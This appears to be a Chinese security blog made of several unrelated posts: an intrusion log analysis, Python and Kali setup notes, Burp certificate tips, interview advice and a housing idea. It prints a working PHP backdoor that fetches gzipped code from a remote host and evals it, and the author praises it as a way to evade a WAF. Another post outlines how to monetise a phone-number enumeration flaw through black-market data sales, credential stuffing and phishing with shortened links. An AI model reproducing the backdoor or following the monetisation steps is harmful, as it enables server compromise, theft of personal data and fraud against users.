138.128.212.179 – – [19/Jul/2016:16:22:01 +0800] “GET /Uploads/146890724044584.png HTTP/1.1” 200 87084 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:10 +0800] “GET /Uploads/146890703177801.jpg HTTP/1.1” 200 44256 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:16 +0800] “GET /Uploads/146890694154072.png HTTP/1.1” 200 81028 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:22 +0800] “GET /Uploads/146890667880773.png HTTP/1.1” 200 69520 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:30 +0800] “GET /Uploads/146890663744137.png HTTP/1.1” 200 100128 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:37 +0800] “GET /Uploads/146890655699351.png HTTP/1.1” 200 135056 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:44 +0800] “GET /Uploads/146890646027724.png HTTP/1.1” 200 103372 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:50 +0800] “GET /Uploads/146890637216135.png HTTP/1.1” 200 108561 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:55 +0800] “GET /Uploads/146890628924480.png HTTP/1.1” 200 104940 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:23:00 +0800] “GET /Uploads/146890463858741.png HTTP/1.1” 200 82636 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:23:06 +0800] “GET /Uploads/146890438128119.jpg HTTP/1.1” 200 182931 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:23:16 +0800] “GET /Uploads/146890436882884.jpg HTTP/1.1” 200 182931 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:23:32 +0800] “GET /Uploads/146890420781045.png HTTP/1.1” 200 126604 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:23:43 +0800] “GET /Uploads/146890419983679.jpg HTTP/1.1” 200 51284 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:23:53 +0800] “GET /Uploads/146890362678175.png HTTP/1.1” 200 85621 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:24:00 +0800] “GET /Uploads/146890345652557.png HTTP/1.1” 200 83409 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:24:35 +0800] “POST /Public/kindeditor/php/upload.php HTTP/1.0” 200 186 “http://slbvip.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”

//上面黑客上传的图片,如果图片中包括恶意代码也执行不了,除非借助解析漏洞;
//最后黑客又扫了扫,然后就没有日志了,到此反渗透日志分析到此结束咯。

一个PHP后门的分析过程

<?php
$password='123';
//----------功能程序------------------//
$c="chr";//字符串
session_start();

if(empty($_SESSION['PhpCode'])){
$url.=$c(104).$c(116).$c(116).$c(112).$c(58);
$url.=$c(47).$c(47).$c(104).$c(106).$c(105);
$url.=$c(117).$c(46).$c(108).$c(97).$c(47);
$url.=$c(115).$c(99).$c(120).$c(112).$c(46);
$url.=$c(103).$c(105).$c(102);

//$url = chr(104)chr(116)chr(116)chr(112)chr(58)chr(47)chr(47)chr(104)chr(106)chr(105)chr(117)chr(46)chr(108)chr(97)chr(47)chr(115)chr(99)chr(120)chr(112)chr(46)chr(103)chr(105)chr(102)

//$url = http://hjiu.la/scxp.gif

$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);

//$get = chr(102)chr(105)chr(108)chr(101)chr(95)chr(103)chr(101)chr(116)chr(95)chr(99)chr(111)chr(110)chr(116)chr(101)chr(110)chr(116)chr(115)

//$get = file_get_contents

echo  $get($url);

$_SESSION['PhpCode']=$get($url);
}

//echo $url;

$unzip=$c(103).$c(122).$c(105).$c(110);
$unzip.=$c(102).$c(108).$c(97).$c(116).$c(101);
//echo $unzip;//die;

//chr(103).chr(122).chr(105).chr(110)chr(102).chr(108).chr(97).chr(116).chr(101)

//$unzip = gzinflate 解码处理
@eval($unzip($_SESSION['PhpCode']));

?>

今晚帮客户分析一个后门程序,分析过程如上,试了下过不了狗,eval直接写肯定就过不了狗,估计改改可以绕过安全狗,真是一个完美的思路,调用远程加密的后门代码绕过WAF。

Python常用库安装汇总

安装easy_install
下载地址:https://pypi.python.org/pypi/ez_setup
解压,安装 python ez_setup.py

安装pip
下载地址:https://pypi.python.org/pypi/pip
解压,安装 python setup.py install
linux下安装依赖setuptools库:
wget http://pypi.python.org/packages/source/s/setuptools/setuptools-2.0.tar.gz
tar zxvf setuptools-2.0.tar.gz
cd setuptools-2.0
python setup.py build
python setup.py install
wget https://pypi.python.org/packages/e7/a8/7556133689add8d1a54c0b14aeff0acb03c64707ce100ecd53934da1aa13/pip-8.1.2.tar.gz#md5=87083c0b9867963b29f7aba3613e8f4a
cd pip-1.4.1/
sudo python setup.py install
########################在安装python2.7.9时如果选择了pip上面就不用安装了,否则按照上面流程安装pip#########

安装requests库

cd 到 C:\Python27\Scripts> 目录
执行命令 pip install requests
测试 import requests

安装 lxml
执行命令 pip install lxml
测试 import lxml,
在win7下安装有时会有问题,直接去官网下载exe安装好了:https://pypi.python.org/pypi/lxml/3.6.0

安装 beautifulsoup4
执行命令 pip install beautifulsoup4
测试 from bs4 import BeautifulSoup

python编译py为pyc文件 python -m py_compile demo.py
或者
import compileall
compileall.compile_dir(r’/home/root/Desktop/demo.py’)

安装py2exe 官网下载链接:http://www.py2exe.org/
在python的目录下面,通常是(C:\Python27,看你安装Python的位置)建立setup.py文件,文件中输入以下代码:
from distutils.core import setup
import py2exe
setup(console=[“将要转换的文件名称.py”])
从终端(cmd)进入Python27目录,输入以下命令
python setup.py py2exe
这样便完成了从.py文件到 .exe文件的转换
生成的软件在dist文件夹内
如果用到了lxml库,则应该用 python setup.py pyexe -p lxml,gzip 命令,否则会报错!

 

安装Scrapy #经过验证,在win下需要很多依赖库,比较麻烦

1.安装twisted,需要先安装下面的依赖库
#项目路径:sourceforge.net/projects/pywin32/files/

A.安装zope.interface
下载链接:https://pypi.python.org/pypi/zope.interface#download
我是win32系统,下载下面的链接EXE文件直接安装了,
https://pypi.python.org/packages/43/a3/7092ca779bf09a50128c45875700ecff55db2de0a98e5ab969b73bdf5e7a/zope.interface-4.2.0.win32-py2.7.exe#md5=e816efeac869c956d1d1da7a985dab8c
#安装完后 import zope.interface,验证是否安装成功

B.安装pyopenssl
下载链接:https://pypi.python.org/pypi/pyOpenSSL#downloads
这里只有两个,一个whl在线安装的,一个离线安装的,我下载了第一个whl在线安装的,
pip install C:\Users\Administrator\Desktop\pyOpenSSL-16.0.0-py2.py3-none-any.whl
有的人没有设置Python27/Scripts环境变量,要CD切换到Scripts目录去执行
安装完了,貌似安装了好几个东东进去,Successfully installed cffi-1.7.0 cryptography-1.4 enum34-1.1.6 idna-2.1 ipaddre ss-1.0.16 pyOpenSSL-16.0.0 pyasn1-0.1.9 pycparser-2.14setuptools-25.1.0
//上面的只找到32位操作系统的whl包,如果能找到64位的whl包也可以,我找了个msi包:https://www.egenix.com/cryptodownload/?file=egenix-pyopenssl-0.13.0_1.0.0g_1.win-amd64-py2.7.msi
#安装完后 import OpenSSL,验证是否安装成功

C.安装twisted
按照网上说的,找到的是64位whl的,一直安装不成功,本地是32位的,没看到官网32位的,于是重新搜索了一个,下载地址:http://www.newasp.net/soft/77004.html
pip install C:\Users\Administrator\Desktop\Scrapy-1.1.1-py2.py3-none-any.whl
#Installing collected packages: Scrapy, attrs, pyasn1-modules
#Successfully installed Scrapy-1.1.1 attrs-16.0.0 pyasn1-modules-0.0.8
#安装完后 import scrapy,验证是否安装成功

##全部安装成功后,在命令行输入 scrapy 会显示相关使用参数说明。还需要lxml库。。。这里就不写了。。。

linux下安装: pip install Scrapy #貌似linux安装的比win自己分别安装的库多,推荐linux安装
scrapy

在Kali下创建项目报错##raise VersionConflict(dist, req).with_context(dependent_req)
pkg_resources.ContextualVersionConflict: (pyasn1 0.1.3 (/usr/lib/python2.7/dist-packages), Requirement.parse(‘pyasn1>=0.1.8’), set([‘pyasn1-modules’])),则需要升级下pyasn1,具体执行下面命令:
sudo?apt-get?install?python-pip #安装pip
sudo? pip install –upgrade pip??? #升级pip
sudo? pip install –upgrade pyasn1 #升级pyasn1
scrapy startproject spider_app #创建项目
#root@0535coder:~# scrapy startproject spider_app
#New Scrapy project ‘spider_app’, using template directory ‘/usr/local/lib/python2.7/dist-
#packages/scrapy/templates/project’, created in:
#??? /root/spider_app
#
#You can start your first spider with:
#??? cd spider_app
#??? scrapy genspider example example.com

 

安装django

pip install django

缓解外地人在北京买房的一个想法

在北京租房,一年会涨100-500元不等,买房就甭提了,放假飙升太快,如果有一套自己的房子,指不定多久就是下一个千万富翁了。
但是在北京不是每个人都能买大产权房,有限购房和不限购房,限购房一般是70年大产权的房子,不限购的一般是商住两用30-50年或者没有产权的回迁房等。在没有购房资格的情况下,如果等着有购房资格了,快的话需要2,3年时间,慢的话需要5年多时间,在这3-5年的时间里,房价降低的可能性不大,降也是小浮动降,而且会出一些什么新政策也都不好说,所以还是要先下手为强了。
目前了解想要有购房资格就必须要有居住证,而居住证的办理有两种方式,一种是本科毕业,有学位证书,工作半年时间,月缴纳个人所得税超过800元,剩下其他的条件都好办,主要是学历的问题,可以考,花钱买,但是学位是要自己考的,如果没有本科学历和学位,通过提升学历方法办理居住证,至少在2-3年时间,还有另一种方式是考中级职称,中级职称可以和学历,学位一样,而中级职称一般一年有两次考试机会,好好学下在3年时间内相信可以搞定的。
现在很多人的情况是只能购买商品房,不能购买大产权房,在这里我突然有了一个想法,不确定是否靠谱,想先买套30-50年的小产权商品房,这种房新房一般在首付50%,二手房首付一般在70%-90%,剩下的50%或30%-10%可以贷款,然后在5-10年内把剩下的贷款还清,还清后再用这套房子做抵押贷款。
问题出来了,第一商品房是否能做抵押贷款买房? 正常的话是可以贷款的,但是作为小产权房产作为首付贷是否可以? 问过银行貌似不可以,不晓得是否有途径解决这个问题。
假设做了房产抵押,那商品房可以贷出30w(房子原值的50%),贷出钱来后,这套商品房每个月租出去的租金, 在10年内就会还清商品房抵押贷款,在还第一个房子贷款的时间里,有5-10年时间,甚至3年时间就可能办下居住证了,可以买居住房70年产权的了。
问题又出来了,居住证现在有两种方式,一种是本科学历和学位,另一种是中级职称,我选择考中级职称,在这么久的时间内,居住证的办理方式是否会变化,是否会拿到居住证?这个问题还好,如果办理不了居住证,依然可以再买商品房期房。买了后自己再还新房的贷款。
买两套房计划,行不行的通,关键就看是否可以想办法做首付贷了。
//经过多位朋友和公司同事领导的验证,不靠谱。。。

2016 Kali 新版vmware tools安装方法

以前老版本直接安装虚拟机提供的vmware tools就可以了,新版的用虚拟机提供的不管用,要apt-get 安装,如下:
安装之前遇到一个问题:已将该虚拟机配置为使用 64 位客户机操作系统。但是,无法执行 64 位操作,网上查了下,要更改BLOS,
开启BBLOS中的Security? –Virtualization –Intel Virtualization Technology;
下面就是新版Kali安装vmware tools的命令了。使用前要先更新源噢,不然找不到文件,参考:http://0535code.com/article/20160810_972.shtml
在添加源的时候,必须要增加 #中科大的源噢,不然会缺少其他几个依赖包:
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
apt-get update
apt-get install open-vm-tools-desktop fuse
reboot
发现拷贝多个文件时,总是会有bug,导致拷贝的文件不全噢、在 /tmp/VMwareDnD 目录中找回丢失的文件!

burpsuite ios手机抓包ssl及证书问题

安装好火狐浏览器后,会提示ssl_error_weak_server_ephemeral_dh_key,而用IE没有提示,一般正常不会有这个提示,查探了下究竟是由于安装的jdk版本问题,如果安装的低版本的不会有这个提示,如果安装的是jdk高版本的话用火狐浏览器会有这个提示,具体版本号忘掉了。翻译过来提示的是不支持弱密钥,遇到这个问题,需要安装一个插件:
https://addons.mozilla.org/en-us/firefox/addon/disable-dhe/
今天用IOS系统微信打开某https://hd.faisco.cn/****网站,发现抓不了包,解决这个的办法其一是在电脑下载电脑版微信客户端,电脑板客户端肯定是没有问题的了,可以抓到包,之前尝试过。搞半天,在同事的帮忙下,弄明白了原理,在这里也记录并分享下。
HTTPS分为单项认证和双向认证,单项认证只有在客户端有证书,双向认证是在客户端和服务端都要证书;客户端的单项证书,又分为对称加密和非对称加密。之前遇到的都是对称加密,burpsuite会自动伪造一个CA证书,碰到非对称加密的时候需要导入证书就是这次遇到的问题了。
首先用火狐打开目标网站,在下面会有添加例外按钮,点添加按钮的时候可以导出PortSwigger.der证书,然后本地搭建一个web站点,把证书放到web站点根目录,通过IOS内置手机浏览器访问http://192.168.1.11/PortSwigger.der,会直接提示安装,安装就好了,安装完了后,就可以正常抓这个站的包了。

WEB安全工程师、WEB渗透测试面试总结

工作几年后,再次面试,与开始的面试不一样了,刚毕业的时候面试好多都是笔试,然后问问就好了,那时几乎接触不到BAT的面试邀请,如果接到或许早就懂面试之道了。之前的面试中,有一次刻苦铭心的记忆,了解,熟悉,精通这六个字差别很大很大。几乎在每个招聘要求中都会提到这六个字其中的两个,要求了解的话,不是听说过这个东西,而是用过这个东西,除非是实习生,要求不会很高。要求熟练的话,要是熟练运用了,不论普通的运用,还是高级的运用,都要熟练运用,不然问到一个点,都没听说,没用过,就尴尬了。要求精通的话,是在每个细节上必须都有独特的见解,当熟悉运用的时候,知道思路,不会的话可以抽象的解析说出来,而要求精通的话,不可以抽象的说出来,必须明确的说出来。于是之后面试过程中,了解,熟悉,精通的每一项我都会仔细去看,如果存在模糊的点,就不浪费彼此的时间了。
工作有经验了后,这次面试了3,4家公司,发现一个共同的特点,至少要两面,一般第一面是技术面,或者是管理面,两者的顺序有时会有变化,一般技术有时间,先是技术优先面试的,面试通过后才会有做管理的去面试你。有的还会有HR环节,有的直接跳过,如果组织机构比较负责的话,面试次数还会多最多的是五轮,这次面过最多的是三轮,第一轮技术面,第二轮CEO面,第三轮人事经理面,也遇到过一个公司,技术和管理一起面,面完当时给结果。总之不管是几轮,离不开技术和情商,第二个所谓的情商,主要是看解决问题的能力,会了技术后,当遇到一个不懂的问题会去怎么解决,这一点确实很重要,有的人几小时就可以解决,有的人可能要花上10几倍的时间了。效率很重要,情商一般都是管理层在面试的,而问的问题几乎的都是统一的,最经典的一个问题是:谈下你工作中印象最深刻的一次经历。第一次面试的时候,自己啥都没想,脑子沾糨糊了,说没有啥,直接挂掉了,其实不是没有,是有很多,只是当时不在状态,作为不懂技术的管理层,问这个是在考察你的经历,是否有独立解决问题的思路和能力,要知道成长为一个有经验的技术,必须要经历过无数深刻的问题,才能茁壮成长起来。我说没啥,说明情商好低,有的人或许只会一点点,会把这一点点扩大化,顺利通过情商面试的考验,还有其他一系列的问题都是围绕情商相关的,这关情商面很重要,一不小心就跌倒了。很多做技术的都情商低,高学历,高背景,在管理看来这点不会看的特别重,可以拟补一下情商,普通孩子可就不行了,要给你设立这道门槛,不过聪明的孩子,再设也木有用。除了情商面,在技术面的时候,或者情商面的时候,人家管理懂技术,会问你一个你比较熟悉的技术点,开始会大概问几个问题,看你的广度,后来会拿一个技术点去考你,问为什么是A?你说因为B,然后会问为什么因为B?你说因为C,继续问你为什么因为C,你说因为D。。。无限下去,有多深,问到你多深。最好的表现是回答到最后,回答到最后技术面试官都无法定夺答案的正确性,哈哈。
通过最近一段时间的面试,觉得分为技术面和情商面,必须要准备的有:
1.一项非常深入的技术点,甚至深入的网上查不到相关资料;(当然这是在有一定广度技术的基础上,不然在广度的问题层面就通不过,不会问你深入的问题)
2.一个刻苦铭心的项目经历,或者是多个,这个是给情商面试官准备的,别小看了情商面试官,情商面试官是最高级的,就好像武侠剧里修炼的无招胜有招的境界了,要注意每一个环节,每一句话的背后都有一把刀,任何时候都要小心。
参加过360攻防实验室的面试、打了2次电话,在第二次电话,被我拒绝了,因为已经和另一家公司确定入职了,在360和BAT这类公司准备太多木有用,考察技术只是基础,看你的知识层面,这点并不是特别重要,基本的都会好了,重要的是会面你逻辑和算法,这两个必须过关,要么就是技术研究的很深比较前沿的技术了。

用户信息泄漏漏洞新姿势利用技巧

金融行业用户信息蛮值钱的,获取的方式有多种方式sql注入,xss跨站,命令执行,未授权接口查询等等,今天遇到一个未授权接口查询的漏洞,有验证码,是前端刷新的验证码,后端效验,这种把前端的请求给丢弃好了。是在注册页面上,当用户已经注册了会提示用户存在,用户不存在的时候会发验证码,验证手机号。绕过验证码后,就可以知道那些手机号注册了,那些手机号没有注册。虽然是一个简单的信息泄漏问题,都有那些危害,怎么利用,作为白帽子研究的就少了,灰帽子的方式会有多种多样,这里总结了以下几种利用方式。
1.在黑产中,不需要知道用户密码,只知道了手机号就可以了,还可以通过其他接口查到手机号码主人的名字和身份证信息等,把资料更加精准化,提高资料质量,如果资料库较大的话,可以卖一份不错的价格,一份信息泄漏,直接可以转化为商业价值。
2.还有一些可能不是金融行业,其他行业,单纯知道了手机号意义不大的,要知道账户里面的资料才会比较有价值,这时有一种不太靠谱的做法,收集自己的社工库资源,可能自己的不够强大,需要网上买一些,要先验证部分的有效性,很容易被骗哦。然后利用社工库去写个脚本撞库,之所以所这种方式不太靠谱,是因为成本太大,而最后结果未必是很理想的。
3.接着2继续新姿势利用,可以直接钓鱼,先做一个伪页面,或者直接扒站,把想要的账户,密码都记录下来,以防万一网址被封,用短域名把url转换一下,给对方发到手机号上或者邮箱中,要客户主动把信息送过来不是更靠谱。哪怕金融的有支付密码,也可以搞定。其他行业就更不用说了。

Centos下后台运行Python程序 命令screen

#如果提示锁定执行下面命令
rm -rf /var/run/yum.pid

#安装 screen
yum -y install screen

#启动screen
screen

#查看会话列表
screen -ls

#恢复会话
screen -r 会话ID

使用参数说明
-A  将所有的视窗都调整为目前终端机的大小。
-d <作业名称>  将指定的screen作业离线。
-h <行数>  指定视窗的缓冲区行数。
-m  即使目前已在作业中的screen作业,仍强制建立新的screen作业。
-r <作业名称>  恢复离线的screen作业。
-R  先试图恢复离线的作业。若找不到离线的作业,即建立新的screen作业。
-s  指定建立新视窗时,所要执行的shell。
-S <作业名称>  指定screen作业的名称。
-v  显示版本信息。
-x  恢复之前离线的screen作业。
-ls或–list  显示目前所有的screen作业。
-wipe  检查目前所有的screen作业,并删除已经无法使用的screen作业。

在win下用py2exe编译,把所有动态库也都打包了,通过python compile模块只是编译了当前文件,还需要依赖库,需要装下引用的库: #如果没有pip要先安装下pip,或者提示pip版本过旧,需要更新下。
yum install python-pip && pip install –upgrade pip
pip install requests
yum install libxslt-devel? && pip install lxml
pip install beautifulsoup4